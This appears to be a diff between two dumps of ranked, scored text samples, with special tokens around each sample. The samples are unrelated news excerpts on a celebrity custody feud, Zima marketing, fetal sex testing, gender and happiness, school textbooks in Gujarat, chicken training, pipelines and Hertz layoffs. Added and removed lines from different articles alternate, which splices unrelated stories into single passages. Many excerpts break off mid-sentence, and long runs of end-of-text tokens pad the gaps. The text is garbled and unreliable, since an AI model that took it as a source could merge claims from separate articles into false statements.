text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 50; Score = 138240.0 +<|begin_of_text|>He said, she said. Eddie Cibrian is speaking out once more against his ex-wife, Brandi Glanville. -The goal was to get Zima on the minds and into the hands of young males. Owing to the blanket advertising assault, that's exactly what they accomplished. Zima sold a staggering 1.3 million barrels’ worth of product in 1994, giving it a near-instant 1 percent market share in the booze industry. It was estimated that 70 percent of all drinkers tried the “malternative." +Last week, Glanville, 44, accused the actor and his current wife, LeAnn Rimes, of allegedly stalking her boyfriend, Donald Friese, on social media. In a series of tweets, she claimed that Rimes, 34, watched four of Friese’s Snapchats before showing up with and Cibrian and Glanville’s two sons at the same Malibu restaurant last month. -As Coors would soon learn, those numbers only work in your favor if people like the product. The company was disappointed to learn that many of them didn’t: Men found the taste off-putting. And those who enjoyed it were precisely the demographic they were looking to avoid. +“Stalking my boyfriend to show up with my kids was the last straw,” Glanville tweeted. -Women who normally passed over beer embraced Zima, giving it an effete quality that marketing considered to be grim death for the valued male customer base. If a man couldn’t feel manly taking a pull of the clear stuff, he'd be likely to reach for something else. +Now, Cibrian, 43, is telling his side of the story. -On the public relations side, Coors was also having to defend itself against charges that teenagers were growing fond -================================================================================ -Rank = 50; Score = 296960.0 -<|begin_of_text|>Fetal sex tests have a few medical applications, allowing couples with histories of rare sex-linked disorders to avoid costly and invasive genetic testing if they learn they are expecting the other sex. But for most couples, the tests, which are unregulated, simply answer the boy-or-girl question weeks earlier than ultrasound, and in a less invasive and safer way than amniocentesis. +“Brandi was very drunk and after already being at our table, started to come back again. Her boyfriend ‘ran interference’ and came to ask if she could take photos with the kids,” Cibrian claims in an exclusive statement to Us Weekly. “After witnessing Brandi’s behavior at the restaurant I was concerned about what pictures Brandi might post. We looked at their socials after we got home to make sure there was nothing of concern. That’s exactly how it all went down.” -“Seven weeks is a different time in pregnancy,” said Dr. James Egan, a professor of obstetrics and gynecology at the University of Connecticut Health Center who was a co-author of a study on sex selection with Dr. Chapman and others. “Women haven’t had the ultrasound where you see the fetus that looks like a baby. Many people don’t even know that a woman is pregnant. And you can have a medical termination,” using pills like RU-486, which can be used at home discreetly before 10 weeks of pregnancy. +The Rosewood actor previously opened up about the situation on June 10. “I normally don’t respond to Brandi’s foolishness but I will not allow false and reverse accusations to go unanswered about my wife,” Cibrian told Us in a statement at the time. “LeAnn is a fantastic stepmom to the boys and is always gracious to their mother. Having to put up with Brandi’s made up drama all the time is extremely frustrating. After eight years we should have one priority, making sure two incredible kids are loved and remain happy and healthy. But every couple of months there is another accusation coming from Brandi in an attempt to drum up drama to stay relevant.” -There is evidence that some Americans want to choose their babies’ sex. At the Fertility Institutes, a set of clinics in Los Angeles, New York and Guadalajara, Mexico, 85 percent of roughly 500 couples each year seek sex selection, although three-quarters of them come from overseas, said Dr. Jeffrey Steinberg, the medical director. +He added: “LeAnn and I did not nor have we ever ‘shown up’ at places where Brandi will be. Why would we do that? Makes no sense. We had a reservation held at Nobu five days before Brandi posted she was going. Here is proof and if anyone needs more, call Nobu and they will confirm.” -“It’s jumped over the past four years,” said Dr. Steinberg, whose clinics determine sex through pre-implantation genetic diagnosis, an embryo screening that also detects genetic disorders. He said that “if a woman calls to make the appointment, the couple almost always wants a female. If a man calls, they almost always want a male.” +Cibrian and the former Real Housewives of Beverly Hills star divorced in 2010 after nine years of marriage. As Us Weekly exclusively revealed, Cibrian and Rimes fell for each other while filming the 2009 Lifetime movie Northern Lights together. -But clinics and some ethicists say this type of sex selection is more acceptable because it occurs before embryos are implanted, before pregnancy. +Despite +================================================================================ +Rank = 51; Score = 138240.0 +<|begin_of_text|>If girls just want to have fun, as Cyndi Lauper belted out in 1983, does that mean boys are serious stoics? Lauper probably wasn't trying to make a sociological statement in her head-bopping anthem, but her lyrics point to a much-debated question about gender differences. In studying the relative happiness of people across the globe, do men and women exhibit distinctive emotional characteristics? In short, is one sex generally happier than the other? -“We’re trying to prevent the abortion,” said Dr. Jamie Grifo, program director for New York University’s Fertility Center. His and other clinics typically allow sex selection for couples with two or more children, parents interested in “family balancing,” adding a child of the opposite sex. +It's important to note that evaluating happiness isn't a highly precise scientific undertaking. For one thing, happiness is a subjective term, and there's no universal measurement for it. Though someone smiles on the outside, it doesn't mean that his or her apparent joy reflects internally. Similarly, a lot of studies related to happiness rely on self-reporting. One survey that economists from the Wharton School at the University of Pennsylvania have used simply asks respondents to rate themselves on whether they are "very happy," "pretty happy" or "not happy." The resulting statistics don't take into account the nuances and background information of why and how people scored themselves. -“For someone who has two girls and wants to have a boy, so each sibling can grow up with brother and sister, what’s wrong with that?” Dr. Grifo said. +Despite the potential pitfalls of empirical happiness studies, we can draw some conclusions about who the happiest sociological groups of people are. Generally, older people are happier than younger ones. Wealth and good health also give us something to smile about more often. Yet when it comes to the happiness gender gap, things aren't so cut and dried. -Advertisement Continue reading the main story +The 2003 Pew Global Attitudes Project that surveyed 38,000 men and women across 44 countries lends insight into the disparities between male and female happiness. Overall, women scored themselves as more satisfied with their lives than men [source: Pew Research Center]. Moreover, women from certain countries, including Pakistan, Japan and Argentina, appeared significantly happier. The differences between what affects men and women's levels of happiness explains this slight gender gap. Women, for instance, tend to focus on personal and domestic problems, while men concern themselves more with matters outside of the home. -Still, the cost and commitment of the fertility process makes such sex selection cases relatively unusual. Fetal DNA tests, costing between $250 and $350, are more affordable. +This variation in values is also reflected in how the recent recession has affected people's happiness. According to a Nielson Happiness Survey conducted in 51 countries, men's happiness hasn't weathered the economic storm well since they attach more importance to financial success than women. On the other hand, the women surveyed indicated they appreciated quality relationships above all [source: Reuters]. -Anti-abortion groups are incorporating sex selection in legislative agendas. Arizona and Oklahoma recently passed laws banning sex-selected abortion +But women shouldn't start celebrating the good news just yet.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 51; Score = 294912.0 +Rank = 52; Score = 137216.0 <|begin_of_text|>Testers need to learn to code *. Period. And here’s why. @@ -923,803 +928,814 @@ Instead of investing energy in fighting the inevitable train of change it might We should be careful though to discern from simply following trends such as certifications and following evolutions in how testing is done. One is very dangerous and leads to lazy recruiting and competitions like certification inflation – the other is a natural progression of our testing craft. ================================================================================ -Rank = 52; Score = 294912.0 -<|begin_of_text|>Australia’s Jill Rathborne may have added a new term to the already crowded field of politically correct academese: “micro-inequity.” +Rank = 53; Score = 136192.0 +<|begin_of_text|>Lonely individuals may decode social cues well but have difficulty putting such skills to use precisely when they need them--in social situations. In four studies, we examined whether lonely people choke under social pressure by asking participants to complete social sensitivity tasks framed as diagnostic of social skills or nonsocial skills. Across studies, lonely participants performed worse than nonlonely participants on social sensitivity tasks framed as tests of social aptitude, but they performed just as well or better than the nonlonely when the same tasks were framed as tests of academic aptitude. Mediational analyses in Study 3 and misattribution effects in Study 4 indicate that anxiety plays an important role in this choking effect. This research suggests that lonely individuals may not need to acquire social skills to escape loneliness; instead, they must learn to cope with performance anxiety in interpersonal interactions. -Not encouraged to study science while growing up, Rathborne says she was told by her teachers that college physics classes “would be too difficult.” +© 2015 by the Society for Personality and Social Psychology, Inc.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 54; Score = 136192.0 +<|begin_of_text|># Don’t blow out candles on your birthday. It’s “western culture” and needs to be shunned. Instead, wear “swadeshi clothes” this day, do a havan, pray to the ishtadev, feed cows. -She admits, however, that none of the teachers she had asked had taken physics at college, “so that might have influenced their opinions.” +Advertising -“That conversation didn’t explicitly mention my gender, but I do wonder if they gave that same advice to male students that had similar abilities to me (I was in the top few percent of my high school physics class),” she says. +# Drawing a map of India? Make sure you include Pakistan, Afghanistan, Nepal, Bhutan, Tibet, Bangladesh, Sri Lanka and Myanmar. These are part of undivided India or “Akhand Bharat”. -The Guardian reports: +# Include August 14, Pakistan’s Independence Day, in the list of national holidays. This day should be celebrated as “Akhand Bharat Smriti Divas”. -The problem is these biases are often subtle. It’s these micro-inequities that do the most damage – the small, seemingly inconsequential ways in which people are excluded or discounted that, over time, erode confidence, value and worth and reinforce a culture that is not inclusive. BD: Has there been a moment in your career when you’ve been uncomfortably reminded of your gender? JR: It’s that thought in the back of your mind: am I getting this opportunity because I’m qualified, or because I’m female? Hopefully the former, but perhaps sometimes it might be the latter. I’d like to be known as a scientist, not a female scientist – maybe, if possible, a good scientist. The relevant point here is that typically we wouldn’t ever ask a man this same question when asking him about his career. BD: Have you been encouraged to modify behavior in masculine environments? JR: Astronomy is a very male-dominated field – this is evident in the office, at conferences, in committee memberships. I can’t recall ever being actively told to modify my behaviour, [but] having said that, it takes a certain resilience and personality to be comfortable and successful when you’re a minority in your field. You often need a pretty thick skin, you can’t be easily offended. +These are moral prescriptions from books authored by Dina Nath Batra, convenor of Shiksha Bachao Andolan Samiti, that have now become compulsory reading in government schools in Gujarat. On June 30, the state government issued a circular directing more than 42,000 primary and secondary government schools across the state to make a set of nine books by Batra, translated from Hindi to Gujarati, part of the curriculum’s “supplementary literature”. -So, even though none of her teachers made any point about her being female (and who, by the way, probably had a very good idea about her academic abilities), and though she can’t recall any “active” request to change her behavior in the male-dominated arena, it’s just “that thought in the back of [her] mind …” +Advertising -Not to mention, Rathborne bemoans a “non-inclusive culture” … yet wonders if she got her position merely because of her gender? +Batra’s civil suit earlier this year had led to the pulping of American scholar Wendy Doniger’s book on Hinduism. He had also sent a legal notice to another publisher about a book on modern Indian history which led the publisher to begin a review of some of its books, including one on -Wow. +sexual violence during riots in Ahmedabad. -Read the full article. +The circular issued by the Gujarat State School Textbook Board (GSSTB) read, “These books on supplementary literature are aimed at imparting quality education. They will be provided free of cost to all government primary and secondary schools, public libraries and will be also available at GSSTB, Gandhinagar, for individuals interested in these books. These are to be incorporated from this academic session.” -Like The College Fix +On March 4, Gujarat Education Minister Bhupendrasinh Chudasama released the set of nine books — Shikhan nu Bhartiyakaran, Tejomay Bharat, Prernadeep I, II, III and IV, Vidyalaya: Pravitiyon nu Ghar, Shikhsan ma Triveni and Vedic Ganit. + +On page 59 of the book Shikhan nu Bhartiyakaran (Indianisation of Education), under the chapter Samajik Chetna (social awakening), the author says, “Birthdays should be celebrated by shunning the western culture of blowing candles. Instead, we ================================================================================ -Rank = 53; Score = 294912.0 -<|begin_of_text|>More, faster, better, cheaper. These are the demands of our device-happy and data-centered world. Meeting these demands requires technologies for processing and storing information. Now, a significant obstacle to the development of next-generation device technologies appears to have been overcome, according to researchers from the University of Tokyo (Japan), Tokyo Institute of Technology (Japan) and Ho Chi Minh University of Pedagogy (Vietnam). +Rank = 55; Score = 136192.0 +<|begin_of_text|>Teaching a trick to a chicken increases beliefs that chickens are intelligent and can feel emotions. -Specializing in the emerging field of semiconductor spintronics, the team has become the first to report growing iron-doped ferromagnetic semiconductors working at room temperature -- a longstanding physical constraint. Doping is the practice of adding atoms of impurities to a semiconductor lattice to modify electrical structure and properties. Ferromagnetic semiconductors are valued for their potential to enhance device functionality by utilizing the spin degrees of freedom of electrons in semiconductor devices. +Learning how to train chickens changes student’s attitudes towards them, according to a new study by Susan Hazel Lisel O’Dwyer (both University of Adelaide) and Terry Ryan (Legacy Canine). The chickens were trained to do a specific task (such as pecking on a red but not green circle) in order to get food. Survey responses before and after the class show more positive attitudes after the clicker-training session. -"Bridging semiconductor and magnetism is desirable because it would provide new opportunities of utilizing spin degrees of freedom in semiconductor devices," explained research leader Masaaki Tanaka, Ph.D., of the Department of Electrical Engineering & Information Systems, and Center for Spintronics Research Network, University of Tokyo. "Our approach is, in fact, against the traditional views of material design for ferromagnetic semiconductors. In our work, we have made a breakthrough by growing an iron-doped semiconductor which shows ferromagnetism up to room temperature for the first time in semiconductors that have good compatibility with modern electronics. Our results open a way to realize semiconductor spintronic devices operating at room temperature." +Lead author Susan Hazel told me in an email, “I believe that the main reason for the students’ change in attitudes to chickens was that they realized chickens are smarter than they thought (they learn the colour discrimination tasks very fast) and also when you work with the different chickens you see their personalities.” -The researchers discuss their findings this week in Applied Physics Letters, from AIP Publishing. The researchers' maverick move challenged the prevailing theory that predicted a type of semiconductor known as "wide band gap" would be strongly ferromagnetic. Most research focuses on the wide band gap approach. "We instead chose narrow-gap semiconductors, such as indium arsenide, or gallium antimonide, as the host semiconductors," Tanaka said. This choice enabled them to obtain ferromagnetism and conserve it at room temperature by adjusting doping concentrations. +“Some chickens are fast and other chickens still learn quickly but just respond more slowly,” said Dr. Hazel. “It wasn’t so much of a surprise that students were more likely to believe that chickens were intelligent, are easy to teach tricks to, and that they have individual personalities. It was more surprising that this carried over to students more likely to believe chickens could experience boredom, happiness, and frustration.” -Investigators have long envisioned bridging semiconductors and magnetism to create new opportunities of utilizing spin degrees of freedom and harnessing electron spin in semiconductors. But until now, ferromagnetic semiconductors have only worked under experimental conditions at extremely low, cold temperatures, typically lower than 200 K (-73oC), which is much colder than the freezing -================================================================================ -Rank = 54; Score = 294912.0 -<|begin_of_text|>I am hideously white, and not a man but “male”. Being over 50, I suffer the added failing of being disgustingly old. Such are the routine humiliations of my group. The BBC was called hideously white by its former boss Greg Dyke, and the West End stage hideously white by Andrew Lloyd Webber. This week the Football Association was dismissed by critics as a bunch of “old white men”. Note that it is not the BBC or the theatre that is hideous, but their whiteness. +Some of the differences are quite striking. Before the class, only 7% of students thought it would be easy to teach tricks to a chicken, but after the class this went up to 61%. Beforehand, 49% thought chickens are intelligent, but afterwards 77% agreed. Most of the students thought chickens had individual personalities before the class (84%), but this went up to 95% after. There were some gender differences, including that women gave higher ratings than men for chicken intelligence. -Blame the identity apostles – they led us down this path to populism | Simon Jenkins Read more +Each year the chickens are named according to a theme. This time it was members of the Royal family, and the brightest chicken was one called Margaret. Students had a clicker attached to the handle of a scoop containing chicken food. When the chicken got something right, the trainer pressed the clicker (making a sound to signal to the chicken they did the right thing) and then let the chicken eat from the scoop. -Fashion in collective abuse seeks comfort in crowds. In choosing “pale, stale males” (PSMs) for ritual contempt, identity politics has found a target that it hopes will confess its “guilt”. More recently the epithet “failed” has been added to explain the Brexit/Trump voters. These PSMs are further damned by being uneducated “left-behinders”, and therefore also dumb. They were thought so dumb it was suggested they vote again on Brexit, for having got it wrong first time. +The practical class lasted for 2 hours and included time training chickens and other activities. Chickens were chosen because they are easy to care for and handle in the class – and they are unforgiving of their trainer’s mistakes. The class used a technique called shaping which involves rewarding closer and closer approximations of a task to reach the final behaviour. Students worked in pairs to practice shaping on +================================================================================ +Rank = 56; Score = 135168.0 +<|begin_of_text|>Tech gadgets' plastic and metal bodies can be pretty tiresome, offering little personality and warmth - especially considering how integrated they are with our lives. Recently, wood has stepped in to fill the unnatural void. One of the oldest known materials used to build things, wood is warm, timeless and beautiful. Its durability and unique fingerprint of grain patterns also make this an ideal material to enclose a tech gadget in. -Were someone such as I to take offence, demand redress or “protected space”, I would be bidden to shut up, get a life and not be so sensitive. I might plead, with Shylock: “Hath not a [pale, stale male] hands, organs, dimensions, senses, affections, passions? If you prick us, do we not bleed?” I might turn to Kant and universalise the judgment. What if I were to follow “hideously” with black, female, Jewish, Arab, obese, disabled or Welsh? Is the representation of black footballers in the Premier League (as opposed to the Football Association) “hideously black”? +Above is an image of the Maple Phone, designed by Hyun Jin Yoon and Eun Hak Lee, who have won the Silver award at the International Design Excellence Awards 2008. -The reality is that PMSs are expected to take all this in their stride. They were, after all, the old hegemons. They dished out discrimination; now they should accept a taste of their own medicine. (Or will someone protest that this is patronising: why should PSMs refuse to take offence, as does everyone else?) This is, of course, fair enough – except two wrongs do not make a right. Besides, identity liberalism is surely more than the politics of tit-for-tat. It is a straining after a sort of equality of treatment. +Other wooden phones have been designed, that are interesting to compare. I think the Maple Phone is the most elegant, though. -I have no quarrel with this week’s accusations levelled at the Football Association +Continue for more images of the Maple Phone and other unique wooden phones ><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 55; Score = 292864.0 -<|begin_of_text|>Mass IT layoffs are often small and unnoticed. They are not on the scale of the Carrier air conditioning plant layoff; its Indianapolis facility, which currently employs 2,000 people, is moving to Mexico. - -Hertz IT employees share two things with the Carrier workers: They were also angry, and they got the news on the same day, Feb. 10. - -The Carrier layoffs arrived guillotine-like; the plant is closing, period. But IT layoffs are rarely like that. There are ambiguities and uncertainties and lifeboats for some, and so it was at Hertz. - -In an early morning conference call, Hertz's IT employees were told by the CIO the firm was expanding its outsourcing work with IBM. It wasn't known then how many would lose their jobs or ultimately be hired by IBM. +Rank = 57; Score = 135168.0 +<|begin_of_text|>Pipelines leak. It’s what they do. And the Dakota Access pipeline will be no exception. -But one month later, this much is clear: About 300 Hertz IT employees, most located in Oklahoma City, were impacted by this decision. IBM is hiring about 75 and those workers are expecting to receive offers today. The layoffs will begin this month and be completed by May 31, said Hertz. It's not yet clear if all the 225 or so employees who are not receiving job offers from IBM will be laid off. +The 1,168 mile-long pipeline is intended to transport crude oil from the Bakken oil fields in North Dakota to Patoka, Illinois, passing through South Dakota and Iowa. From there, it will connect with another pipeline to transfer oil to terminals and refineries along the Gulf of México. -After the conference call, employees were stunned. The reaction was, "We're screwed," said an IT employee, one of two interviewed, who requested his name not be used. +However, its construction has hit a snag in Standing Rock, North Dakota. Since September the Standing Rock Sioux Tribe and allies from around the world have been pushing hard to prevent the pipeline from cutting through Sioux Treaty territory. -There was "anger, resentment," especially by employees who "sacrificed that work/life balance to keep things going here," said the employee. +The water protectors maintain–under enormous pressure from the government—that construction of the pipeline must be halted immediately to protect the waters of the Missouri River and “the very survival” of the tribe. -Hertz took precautions. On the day that IT employees learned that their work was shifting to IBM, employees noticed Oklahoma sheriff patrol vehicles in the building's parking lot. They believed plainclothes officers were inside the building. +The pipeline will cross under the Missouri River, the longest river in the United States and the sole water source of the Standing Rock Sioux Tribe. -Hertz explained the security decision. "We consider the safety and security of our people whenever there are circumstances or events that could increase the risk of a disturbance or some form of workplace violence," said Bill Masterson, a Hertz spokesman. +Pipeline ruptures happen all the time. It’s a fact. An excavator might dig in the wrong place. The pipeline might start leaking due to corrosion. It might explode due to poor operation. It could even break due to improper construction or the use of substandard materials. -"Knowing that this was a difficult announcement, we had additional security on hand," said Masterson. This security was in place from Wednesday Feb. 10 through Friday, Feb. 12. +Scorching land, torching homes—and killing multiple people. Pipeline explosions in 2016 show why the #NoDAPL fight is still going strong: pic.twitter.com/RNVfIAWwaj — Fusion (@Fusion) December 1, 